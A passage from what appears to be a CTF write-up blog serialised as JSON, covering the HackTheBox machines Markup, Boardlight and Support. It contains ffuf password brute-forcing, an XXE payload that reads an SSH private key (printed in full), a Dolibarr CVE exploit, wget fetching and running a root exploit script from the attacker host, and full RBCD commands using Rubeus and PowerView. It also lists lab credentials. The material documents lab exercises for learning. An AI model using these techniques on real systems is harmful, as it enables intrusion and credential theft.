90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA) |_ 256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: MegaShopping 443/tcp open ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28 | tls-alpn: |_ http/1.1 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | ssl-cert: Subject: commonName=localhost | Not valid before: 2009-11-10T23:48:47 |_Not valid after: 2019-11-08T23:48:47 |_http-title: MegaShopping Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019 (88%) Aggressive OS guesses: Microsoft Windows Server 2019 (88%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 7.29 ms 10.10.14.1 2 7.93 ms 10.129.95.192 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 29.57 seconds Dirbusting # nothing useful Port 80 # just a login page\nExploitation # we re able to bruteforce the creds\n┌─[eu-starting-point-vip-1-dhcp]─[10.10.15.210]─[htb-mp-1856650@htb-fkehukqxns]─[~] └──╼ [★]$ ffuf -w /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://10.129.95.192/ -fc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : POST :: URL : http://10.129.95.192/ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt :: Header : Content-Type: application/x-www-form-urlencoded :: Data : username=admin\u0026amp;password=FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 200 ________________________________________________ :: Progress: [1/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:password [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 26ms] :: Progress: [43/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:: Progress: [89/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors:: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: ┌─[eu-starting-point-vip-1-dhcp]─[10.10.15.210]─[htb-mp-1856650@htb-fkehukqxns]─[~] └──╼ [★]$ ffuf -w /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt -X POST -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; -H \u0026#34;Content-Type: application/x-www-form-urlencoded\u0026#34; -u http://10.129.95.192/ -fc 200 /\u0026#39;___\\ /\u0026#39;___\\ /\u0026#39;___\\ /\\ \\__/ /\\ \\__/ __ __ /\\ \\__/ \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\ \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/ \\ \\_\\ \\ \\_\\ \\ \\____/ \\ \\_\\ \\/_/ \\/_/ \\/___/ \\/_/ v2.1.0-dev ________________________________________________ :: Method : POST :: URL : http://10.129.95.192/ :: Wordlist : FUZZ: /usr/share/wordlists/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt :: Header : Content-Type: application/x-www-form-urlencoded :: Data : username=admin\u0026amp;password=FUZZ :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200-299,301,302,307,401,403,405,500 :: Filter : Response status: 200 ________________________________________________ password [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 122ms] :: Progress: [101/101] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 :: lets see now\nXXE # Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 !DOCTYPE foo [\u0026lt;!ENTITY xxe SYSTEM \u0026#34;file:///c:/users/daniel/.ssh/id_rsa\u0026#34;\u0026gt;]\u0026gt; Your order for -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- has been processed ","date":"2 March 2026","externalUrl":null,"permalink":"/ctf-writeups/markup/","section":"CTF Writeups","summary":"","title":"Markup","type":"ctf-writeups"},{"content":" Boardlight # Overview # OS: Linux IP: 10.129.231.37 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got in through discovered subdomain with a exploit, escalated w conf file cred reuse, and then esc to root using known exploit.\nLoot # Loot Category Details Usernames $dolibarr_main_db_user=\u0026lsquo;dolibarrowner\u0026rsquo;; , larissa Passwords $dolibarr_main_db_pass=\u0026lsquo;serverfun2$2023!!\u0026rsquo;; Usernames+Passwords larissa:serverfun2$2023!! Hashes dollibar:$2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm Service Versions Enumeration # Nmap # ──(kali㉿kali)-[~/Desktop/vpn] └─$ nmap 10.129.231.37 -sCV -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-01 15:04 EST Nmap scan report for boardlight.htb (10.129.231.37) Host is up (0.12s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA) | 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA) |_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Site doesn\u0026#39;t have a title (text/html; charset=UTF-8). Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds Dirbusting # 403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter 404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter **301 GET 9l 28w 313c http://boardlight.htb/js =\u0026gt; http://boardlight.htb/js/** 301 GET 9l 28w 314c http://boardlight.htb/css =\u0026gt; http://boardlight.htb/css/ 301 GET 9l 28w 317c http://boardlight.htb/images =\u0026gt; http://boardlight.htb/images/ 200 GET 5l 48w 1493c http://boardlight.htb/images/fb.png 200 GET 5l 55w 1797c http://boardlight.htb/images/linkedin.png 200 GET 7l 48w 3995c http://boardlight.htb/images/d-5.png 200 GET 6l 12w 491c http://boardlight.htb/images/user.png 200 GET 5l 14w 1227c http://boardlight.htb/images/insta.png 200 GET 294l 635w 9426c http://boardlight.htb/contact.php 200 GET 3l 10w 667c http://boardlight.htb/images/telephone-white.png **200 GET 294l 633w 9209c http://boardlight.htb/do.php** 404 GET 1l 3w 16c http://boardlight.htb/portfolio.php 200 GET 517l 1053w 15949c http://boardlight.htb/index.php 200 GET 100l 178w 1904c http://boardlight.htb/css/responsive.css 200 GET 5l 23w 1217c http://boardlight.htb/images/location-white.png 200 GET 5l 12w 847c http://boardlight.htb/images/envelope-white.png 200 GET 280l 652w 9100c http://boardlight.htb/about.php 200 GET 6l 52w 1968c http://boardlight.htb/images/twitter.png 200 GET 11l 50w 2892c http://boardlight.htb/images/d-1.png 200 GET 714l 1381w 13685c http://boardlight.htb/css/style.css 200 GET 9l 24w 2405c http://boardlight.htb/images/d-2.png 200 GET 6l 57w 1878c http://boardlight.htb/images/youtube.png 200 GET 348l 2369w 178082c http://boardlight.htb/images/map-img.png 200 GET 536l 2364w 201645c http://boardlight.htb/images/who-img.jpg 200 GET 4437l 10973w 131639c http://boardlight.htb/js/bootstrap.js 200 GET 10038l 19587w 192348c http://boardlight.htb/css/bootstrap.css 200 GET 2l 1276w 88145c http://boardlight.htb/js/jquery-3.4.1.min.js 200 GET 517l 1053w 15949c http://boardlight.htb/ Subd # wfuzz -u http://board.htb/ -H \u0026#34;Host: FUZZ.board.htb\u0026#34; -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hw 1053 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz\u0026#39;s documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://board.htb/ Total requests: 4989 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== **000000072: 200 149 L 504 W 6360 Ch \u0026#34;crm\u0026#34;** Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nlets add this\ncrm.board.htb # I validated this step using the evidence below before moving forward in the chain.\nRobots.txt for crm # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Dollibar Default Creds admin:admin # https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253\nlets just try this exploit\njsut like that we have our shell\nso mysql is running\nwe find the db creds here\n$dolibarr_main_db_user=\u0026#39;dolibarrowner\u0026#39;; $dolibarr_main_db_pass=\u0026#39;serverfun2$2023!!\u0026#39;; $dolibarr_main_db_type=\u0026#39;mysqli\u0026#39;; using these creds we find this in the db\ndolibarr $2y$10$VevoimSke5Cd1/nX1Ql9Su6RstkTRe7UX1Or.cm8bZo56NjCMJzCm and another admin user, but dollibar has last name as superadmin and the admin value set to 1 so lets try cracking this one instead\nwhile that cracks lets see if we can reuse these creds\nand oh we got access as the user larissa via ssh\nwe come across these files\nlets check the CVE its mentioning\nlarissa@boardlight:/tmp$ wget http://10.10.14.137:8080/exploit.sh -o exploit.sh larissa@boardlight:/tmp$ chmod +x exploit.sh larissa@boardlight:/tmp$ ./exploit.sh ./exploit.sh: line 1: --2026-03-02: command not found ./exploit.sh: line 2: Connecting: command not found ./exploit.sh: line 3: HTTP: command not found ./exploit.sh: line 4: Length:: command not found ./exploit.sh: line 5: Saving: command not found ./exploit.sh: line 7: 0K: command not found ./exploit.sh: line 9: syntax error near unexpected token `(\u0026#39; ./exploit.sh: line 9: `2026-03-02 04:03:52 (1.13 MB/s) - ‘exploit.sh.1’ saved [709/709]\u0026#39; larissa@boardlight:/tmp$ ./exploit.sh.1 -bash: ./exploit.sh.1: Permission denied larissa@boardlight:/tmp$ chmod +x exploit.sh.1 larissa@boardlight:/tmp$ ./exploit.sh.1 CVE-2022-37706 [*] Trying to find the vulnerable SUID file... [*] This may take few seconds... [+] Vulnerable SUID binary found! [+] Trying to pop a root shell! [+] Enjoy the root shell :) mount: /dev/../tmp/: can\u0026#39;t find in /etc/fstab. ## whoami root ## and boom we r done\n","date":"1 March 2026","externalUrl":null,"permalink":"/ctf-writeups/boardlight/","section":"CTF Writeups","summary":"","title":"Boardlight","type":"ctf-writeups"},{"content":" Support # Overview # OS: Windows AD IP: 10.129.5.1 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Analyzed binary thru smbshare found hardcoded creds, enumerated with ldapsearch using hardcded creds, then found a acc with genericwriteall abused that with RBCD.\nLoot # Loot Category Details Usernames support:Ironside47pleasure40Watchful Passwords Usernames+Passwords LDAP:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz Hashes Service Versions Enumeration # Nmap # └─$ nmap support.htb -sCV -A -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-02-23 05:48 EST Nmap scan report for support.htb (10.129.5.1) Host is up (0.044s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-02-23 10:48:15Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows AcStive Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%) OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-02-23T10:48:30 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Dirbusting # Nothing Interesting SMB # smbclient -L //support.htb0 -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to support.htb0 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available There are a bunch of shares, lets look through them\n─$ smbclient //10.129.5.1/support-tools -N Try \u0026#34;help\u0026#34; to get a list of possible commands. smb: \\\u0026gt; dir . D 0 Wed Jul 20 13:01:06 2022 .. D 0 Sat May 28 07:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022 putty.exe A 1273576 Sat May 28 07:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022 UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022 4026367 blocks of size 4096. 941659 blocks available smb: \\\u0026gt; get SysinternalsSuite.zip we will try grabbing this and checking it out\nthat kept timing out due to size probably, so lets check the userinfo and get back to it later if we can\nlemme just run this on my windows system rq\nPS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v PS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v find [-] At least one of -first or -last is required. PS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v find -first muqaram [*] LDAP query to use: (givenName=muqaram) [-] Exception: The server is not operational. PS C:\\Users\\muqar\\Desktop\\UserInfo.exe\u0026gt; .\\UserInfo.exe -v user -first muqaram Unable to parse command \u0026#39;user\u0026#39; reason: Required option \u0026#39;-username\u0026#39; not found! Usage: UserInfo.exe [options] [commands] Options: -v|--verbose Verbose output Commands: find Find a user user Get information about a user So it is trying to connect to some server which seems to not be operational?, lets try analyzing it further with dnspy\nwe find this\nthere is a script to decode it aswell so lets run it and see what we get\nand BOOM we have our decryped password\nnvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz Lets use it to authenticate into LDAP\nLDAP # ┌──(kali㉿kali)-[~/Desktop/Boxes/support] └─$ crackmapexec smb support.htb0 -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; SMB support.htb0 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB support.htb0 445 DC [+] support.htb\\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz nice we have the creds for the ldap user\nlets start up bloodhound\nBloodhound Analysis # bloodhound-python -c ALL -u ldap -p \u0026#39;nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz\u0026#39; -d support.htb -ns 10.10.11.174 lemme examine this data now\nshared support accounts seems to have generic all over dc.support.htb, that is pretty interesting, lets mark it as high value\nnothing good from here\nlets do ldap enum and check the info field\nLets use apache directory studio\nwe find these users\nthe support user seems to have this in the info field, lets try to connect w this\nPort 80 # Exploitation # Should have used this heading earlier\nlets get in now\nwe apparently have generic write all over the dc\nRBCD # BloodHound mentions that due to the GenericAll privilege we can perform a Resource Based Constrained Delegation (RBCD) attack and escalate our privileges.\nIn a nutshell, through a Resource Based Constrained Delegation attack we can add a computer under our control to the domain; let\u0026rsquo;s call this computer $FAKE-COMP01 , and configure the Domain Controller (DC) to allow $FAKE-COMP01 to act on behalf of it. Then, by acting on behalf of the DC we can request Kerberos tickets for $FAKE-COMP01 , with the ability to impersonate a highly privileged user on the Domain, such as the Administrator . After the Kerberos tickets are generated, we can Pass the Ticket (PtT) and authenticate as this privileged user, giving us control over the entire domain.\nThe attack relies on three prerequisites:\nWe need a shell or code execution as a domain user that belongs to the Authenticated Users group. By default any member of this group can add up to 10 computers to the domain.\nThe ms-ds-machineaccountquota attribute needs to be higher than 0. This attribute controls the amount of computers that authenticated domain users can add to the domain.\nOur current user or a group that our user is a member of, needs to have WRITE privileges ( GenericAll , WriteDACL ) over a domain joined computer (in this case the Domain Controller).\nUploading the necessary Scripts\nC:\\Users\\support\\Documents\u0026gt; upload ../../Tools/ACTIVEDIRECTORY/Rubeus.exe C:\\Users\\support\\Documents\u0026gt; upload ../../Tools/ACTIVEDIRECTORY/PowerView.ps1 C:\\Users\\support\\Documents\u0026gt; upload ../../Tools/ACTIVEDIRECTORY/Powermad.ps1 . .\\PowerView.ps1 . .\\Powermad.ps1 I’ll need to know the administrator on DC, which Bloodhound tells me is administrator@support.htb:\nI’ll verify that users can add machines to the domain:\nI’ll also need to make sure there’s a 2012+ DC in the environment:\nEvil-WinRM* PS C:\\programdata\u0026gt; Get-DomainController | select name,osversion | fl Name : dc.support.htb OSVersion : Windows Server 2022 Standard 2022 Standard is great.\nFinally, I’ll want to check that the msds-allowedtoactonbehalfofotheridentity is empty:\nEvil-WinRM* PS C:\\programdata\u0026gt; Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl name : DC msds-allowedtoactonbehalfofotheridentity : It is.\nNew-MachineAccount -MachineAccount 0xdfFakeComputer -Password $(ConvertTo-SecureString \u0026#39;0xdf0xdf123\u0026#39; -AsPlainText -Force) $fakesid = Get-DomainComputer 0xdfFakeComputer | select -expand objectsid $fakesid S-1-5-21-1677581083-3380853377-188903654-6101 Now I’ll configure the DC to trust my fake computer to make authorization decisions on it’s behalf. These commands will create an ACL with the fake computer’s SID and assign that to the DC:\n$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \u0026#34;O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))\u0026#34; $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{\u0026#39;msds-allowedtoactonbehalfofotheridentity\u0026#39;=$SDBytes} I’ll verify it worked:\n$RawBytes = Get-DomainComputer DC -Properties \u0026#39;msds-allowedtoactonbehalfofotheridentity\u0026#39; | select -expand msds-allowedtoactonbehalfofotheridentity $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 $Descriptor.DiscretionaryAcl Auth as the Fake Computer\nPull the Hash\n.\\Rubeus.exe hash /password:0xdf0xdf123 /user:0xdfFakeComputer /domain:support.htb rc4_hmac : B1809AB221A7E1F4545BD9E24E49D5F4\n.\\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt *Evil-WinRM* PS C:\\Users\\support\\Documents\u0026gt; .\\Rubeus.exe s4u /user:0xdfFakeComputer$ /rc4:B1809AB221A7E1F4545BD9E24E49D5F4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt ______ _ (_____ \\ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \\| ___ | | | |/___) | | \\ \\| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.3 [*] Action: S4U [*] Using rc4_hmac hash: B1809AB221A7E1F4545BD9E24E49D5F4 [*] Building AS-REQ (w/ preauth) for: \u0026#39;support.htb\\0xdfFakeComputer$\u0026#39; [*] Using domain controller: ::1:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIFvjCCBbqgAwIBBaEDAgEWooIEzTCCBMlhggTFMIIEwaADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBIcwggSDoAMCARKhAwIBAqKCBHUEggRxjMdq92Jp 7rYGfC3rg4Ws9H2mvkU03wFygL8YLuwdeSRWjdkd6cCWBoipNMLIQURvbNyOgSMlwV9fJFefIpzWRU7R HtJH0OUj7ULbmuQuxhaYde0wwVW2iudU2U2lgtSpHriPY8mJ9stlq/kc8s+N6WI5PN/R6zdtc+bAiq15 1uXnDtrw6dEwrTzVyEYj4RrWGnfgihpyNGSIjvSD9DffP+ftzFUwdMHKrYRoXvD9uqWlpWwVKcLi3ebe 9t99Ga6NDnqPd61Ly1aK9UtzCDKQSCNafFfM6sHLVvXuOgHH7pyAv544fxgV165M0eO44WRtAPkuo34r dqh+H7rxr0+G1dcEc16TUhjdBxQ/VrNi+M6pb1MnQ0ztnq4Y6R2SZbI37y3cLl33OALHxszfTlPwhkuI KC3EoLQfXXs/pnl+aNyrkMqUEspjlGV7ofphnYDzC978rMltDgnvTaI7UAds8j3PeZLIJuC3zsjEe5oZ RWvjgQx6/74mFWn1aI3lIMk1g6K3i7bwNBvGLt09HYx/cA6nCjTGzZdPpmfXGonBqEXH827FGNlZy2nl pa9QH7Un2a1pKDkSKUl1tQrnWt07+aSbmGTJhDLiN1dwoizvumB/33XWwZ3lL2JPgxk3ct+ou+T4K5R1 u+N7x7M3SHnpF6ADmJTS+uahDH+e1eA/io7mSom5mFBQxsjvhyhcZYy1U7jgB1O+Dt05tkM5tPikYItb ONoXE6lJGz0D6raBN1zDuK3dXbefSpLA2asd4afvvgQBPSWep4ZfchNty9yRbn44cRtoLX6Gl1dHBP/b g2BbmuEPTIsPwt0A5uHIxe0E0f353vcXIDKB3g6BGP7u9hVn4GBTW+QYU8+A6FAfVeV9bEJRqsFnAq80 bQN2VxFNXFmBBcq3E5tIartpPf2+yDuxoyQAJZxHZaqHTw41W3qExfYUwFD+khYHTa5C7XX94SoMlN34 Rx4SqRQu/DvcgKRQW5/4iTkPdkGeSvlvAQiRyik9L1awzO4FiBwWPKz6r+/BCkKG1Su8SeZTKNhz6Dzc 6Aw7RrqaW89iKjJUfeKzzIG/Oxb4NTc/19uLSSv/80Tq5TrVJNPGZpvl/1N9zm9tonzph2Qjy3eCvNAa qxR0xmzX97II0J/P8G73JFgSyyMaJtOjK8JJfQTHE/58/0qYXO+9dvOsYksxyxgpPKEBLtKDfspMLlPJ eoklkUuEUk8JsH041I06tm3qcsExu6XgsEaSck5FipqTItFjh5WF85vhZhZ4Twir8z4lIohj57a43OKb kwA7fUDiG1eWPJR0lXlY7nnmIFbFsjTwpvmVYdtwxRsX6yMGG6K2C531/lBqn6FTPY+0jG/mUkRhdpBH zTRGPP3zuokkUbeL/O7uPfdVNWbVOQH6FSmFDaGn6VvW+hS08plQj1k/9YjzQK7XG3EzMHV7Y98qU86V 